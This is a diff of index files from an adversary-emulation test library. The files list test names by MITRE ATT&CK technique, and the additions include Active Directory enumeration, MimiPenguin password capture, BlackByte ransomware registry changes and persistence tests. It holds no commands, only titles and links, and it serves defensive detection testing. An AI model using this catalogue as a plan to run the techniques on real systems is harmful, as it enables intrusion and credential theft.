 discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -558,8 +580,13 @@ discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a
 discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
 discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
 discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
+discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
+discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
 discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
 discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
+discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
+discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
+discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt
 discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
 discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
 discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
@@ -571,6 +598,10 @@ discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,9
 discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
 discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
 discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
+discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
+discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
+discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
+discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
@@ -686,6 +717,7 @@ execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a6
 execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
 execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
 execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
+execution,T1059.003,Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell
 execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
 execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
 execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
@@ -8,6 +8,7 @@
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
  - Atomic Test #1: Rubeus asreproast [windows]
+  - Atomic Test #2: Get-DomainUser with PowerView [windows]
 - [T1552.003 Bash History](../../T1552.003/T1552.003.md)
  - Atomic Test #1: Search Through Bash History [linux, macos]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -146,6 +147,7 @@
 - [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
  - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
  - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
+  - Atomic Test #3: Capture Passwords with MimiPenguin [linux]
 - [T1606.002 SAML Tokens](../../T1606.002/T1606.002.md)
  - Atomic Test #1: Golden SAML [azure-ad]
 - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
@@ -269,7 +271,8 @@
  - Atomic Test #1: At.exe Scheduled task [windows]
 - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
  - Atomic Test #1: Authentication Package [windows]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
+  - Atomic Test #1: Add a driver [windows]
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
  - Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
@@ -403,6 +406,7 @@
  - Atomic Test #5: Suspicious jse file run from startup Folder [windows]
  - Atomic Test #6: Suspicious bat file run from startup Folder [windows]
  - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
+  - Atomic Test #8: Add persistance via Recycle bin [windows]
 - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
  - Atomic Test #1: Scheduled Task Startup Script [windows]
@@ -738,6 +742,7 @@
  - Atomic Test #2: Malware Masquerading and Execution from Zip File [windows]
 - [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
  - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
+  - Atomic Test #2: Masquerade as a built-in system executable [windows]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1112 Modify Registry](../../T1112/T1112.md)
@@ -748,6 +753,15 @@
  - Atomic Test #5: Javascript in registry [windows]
  - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
  - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
+  - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
+  - Atomic Test #9: Disable Windows Registry Tool [windows]
+  - Atomic Test #10: Disable Windows CMD application [windows]
+  - Atomic Test #11: Disable Windows Task Manager application [windows]
+  - Atomic Test #12: Disable Windows Notification Center [windows]
+  - Atomic Test #13: Disable Windows Shutdown Button [windows]
+  - Atomic Test #14: Disable Windows LogOff Button [windows]
+  - Atomic Test #15: Disable Windows Change Password Feature [windows]
+  - Atomic Test #16: Disable Windows Lock Workstation Feature [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
  - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
@@ -994,7 +1008,8 @@
  - Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
  - Atomic Test #3: Persist, Download, & Execute [windows]
  - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
+  - Atomic Test #1: Add a driver [windows]
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1176 Browser Extensions](../../T1176/T1176.md)
@@ -1128,6 +1143,7 @@
  - Atomic Test #5: Suspicious jse file run from startup Folder [windows]
  - Atomic Test #6: Suspicious bat file run from startup Folder [windows]
  - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
+  - Atomic Test #8: Add persistance via Recycle bin [windows]
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
  - Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
@@ -1279,6 +1295,8 @@
  - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
  - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
  - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
+  - Atomic Test #11: Get-DomainUser with PowerView [windows]
+  - Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
 - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
  - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
  - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -1288,6 +1306,11 @@
  - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
  - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
  - Atomic Test #8: Adfind - Query Active Directory Groups [windows]
+  - Atomic Test #9: Enumerate Active Directory Groups with Get-AdGroup [windows]
+  - Atomic Test #10: Enumerate Active Directory Groups with ADSISearcher [windows]
+  - Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
+  - Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
+  - Atomic Test #13: Get-DomainGroup with PowerView [windows]
 - [T1482 Domain Trust Discovery](../../T1482/T1482.md)
  - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
  - Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
@@ -1347,12 +1370,17 @@
  - Atomic Test #5: Examine local password policy - Windows [windows]
  - Atomic Test #6: Examine domain password policy - Windows [windows]
  - Atomic Test #7: Examine password policy - macOS [macos]
+  - Atomic Test #8: Get-DomainPolicy with PowerView [windows]
+  - Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
 - [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
  - Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1057 Process Discovery](../../T1057/T1057.md)
  - Atomic Test #1: Process Discovery - ps [macos, linux]
  - Atomic Test #2: Process Discovery - tasklist [windows]
+  - Atomic Test #3: Process Discovery - Get-Process [windows]
+  - Atomic Test #4: Process Discovery - get-wmiObject [windows]
+  - Atomic Test #5: Process Discovery - wmic process [windows]
 - [T1012 Query Registry](../../T1012/T1012.md)
  - Atomic Test #1: Query Registry [windows]
 - [T1018 Remote System Discovery](../../T1018/T1018.md)
@@ -1371,6 +1399,10 @@
  - Atomic Test #13: Remote System Discovery - ip route [linux]
  - Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
  - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
+  - Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
+  - Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
+  - Atomic Test #18: Get-DomainController with PowerView [windows]
+  - Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
  - Atomic Test #1: Security Software Discovery [windows]
  - Atomic Test #2: Security Software Discovery - powershell [windows]
@@ -1622,6 +1654,7 @@
  - Atomic Test #1: Create and Execute Batch Script [windows]
  - Atomic Test #2: Writes text to a file and displays it. [windows]
  - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
+  - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows]
 - [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
  - Atomic Test #1: WMI Reconnaissance Users [windows]
  - Atomic Test #2: WMI Reconnaissance Processes [windows]
@@ -54,6 +54,7 @@
 - [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
  - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
  - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
+  - Atomic Test #3: Capture Passwords with MimiPenguin [linux]
 - [T1606.002 SAML Tokens](../../T1606.002/T1606.002.md)
  - Atomic Test #1: Golden SAML [azure-ad]
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -3,6 +3,7 @@
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
  - Atomic Test #1: Rubeus asreproast [windows]
+  - Atomic Test #2: Get-DomainUser with PowerView [windows]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
@@ -197,7 +198,8 @@
  - Atomic Test #1: At.exe Scheduled task [windows]
 - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
  - Atomic Test #1: Authentication Package [windows]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
+  - Atomic Test #1: Add a driver [windows]
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
  - Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
@@ -291,6 +293,7 @@
  - Atomic Test #5: Suspicious jse file run from startup Folder [windows]
  - Atomic Test #6: Suspicious bat file run from startup Folder [windows]
  - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
+  - Atomic Test #8: Add persistance via Recycle bin [windows]
 - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
  - Atomic Test #1: Scheduled Task Startup Script [windows]
@@ -507,7 +510,8 @@
 - [T1036 Masquerading](../../T1036/T1036.md)
  - Atomic Test #1: System File Copied to Unusual Location [windows]
  - Atomic Test #2: Malware Masquerading and Execution from Zip File [windows]
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
+  - Atomic Test #2: Masquerade as a built-in system executable [windows]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1112 Modify Registry](../../T1112/T1112.md)
  - Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
@@ -517,6 +521,15 @@
  - Atomic Test #5: Javascript in registry [windows]
  - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
  - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
+  - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
+  - Atomic Test #9: Disable Windows Registry Tool [windows]
+  - Atomic Test #10: Disable Windows CMD application [windows]
+  - Atomic Test #11: Disable Windows Task Manager application [windows]
+  - Atomic Test #12: Disable Windows Notification Center [windows]
+  - Atomic Test #13: Disable Windows Shutdown Button [windows]
+  - Atomic Test #14: Disable Windows LogOff Button [windows]
+  - Atomic Test #15: Disable Windows Change Password Feature [windows]
+  - Atomic Test #16: Disable Windows Lock Workstation Feature [windows]
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
  - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
  - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
@@ -706,7 +719,8 @@
  - Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
  - Atomic Test #3: Persist, Download, & Execute [windows]
  - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
+  - Atomic Test #1: Add a driver [windows]
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1176 Browser Extensions](../../T1176/T1176.md)
@@ -794,6 +808,7 @@
  - Atomic Test #5: Suspicious jse file run from startup Folder [windows]
  - Atomic Test #6: Suspicious bat file run from startup Folder [windows]
  - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
+  - Atomic Test #8: Add persistance via Recycle bin [windows]
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
  - Atomic Test #1: Scheduled Task Startup Script [windows]
@@ -904,6 +919,8 @@
  - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
  - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
  - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
+  - Atomic Test #11: Get-DomainUser with PowerView [windows]
+  - Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
 - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
  - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
  - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -913,6 +930,11 @@
  - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
  - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
  - Atomic Test #8: Adfind - Query Active Directory Groups [windows]
+  - Atomic Test #9: Enumerate Active Directory Groups with Get-AdGroup [windows]
+  - Atomic Test #10: Enumerate Active Directory Groups with ADSISearcher [windows]
+  - Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
+  - Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
+  - Atomic Test #13: Get-DomainGroup with PowerView [windows]
 - [T1482 Domain Trust Discovery](../../T1482/T1482.md)
  - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
  - Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
@@ -951,11 +973,16 @@
 - [T1201 Password Policy Discovery](../../T1201/T1201.md)
  - Atomic Test #5: Examine local password policy - Windows [windows]
  - Atomic Test #6: Examine domain password policy - Windows [windows]
+  - Atomic Test #8: Get-DomainPolicy with PowerView [windows]
+  - Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
 - [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
  - Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1057 Process Discovery](../../T1057/T1057.md)
  - Atomic Test #2: Process Discovery - tasklist [windows]
+  - Atomic Test #3: Process Discovery - Get-Process [windows]
+  - Atomic Test #4: Process Discovery - get-wmiObject [windows]
+  - Atomic Test #5: Process Discovery - wmic process [windows]
 - [T1012 Query Registry](../../T1012/T1012.md)
  - Atomic Test #1: Query Registry [windows]
 - [T1018 Remote System Discovery](../../T1018/T1018.md)
@@ -969,6 +996,10 @@
  - Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
  - Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
  - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
+  - Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
+  - Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
+  - Atomic Test #18: Get-DomainController with PowerView [windows]
+  - Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
  - Atomic Test #1: Security Software Discovery [windows]
  - Atomic Test #2: Security Software Discovery - powershell [windows]
@@ -1165,6 +1196,7 @@
  - Atomic Test #1: Create and Execute Batch Script [windows]
  - Atomic Test #2: Writes text to a file and displays it. [windows]
  - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
+  - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows]
 - [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
  - Atomic Test #1: WMI Reconnaissance Users [windows]
  - Atomic Test #2: WMI Reconnaissance Processes [windows]
@@ -12,9 +12,9 @@
 | [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Local Accounts](../../T1078.003/T1078.003.md) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [Authentication Package](../../T1547.002/T1547.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service](../../T1567/T1567.md) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Replication Through Removable Media](../../T1091/T1091.md) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
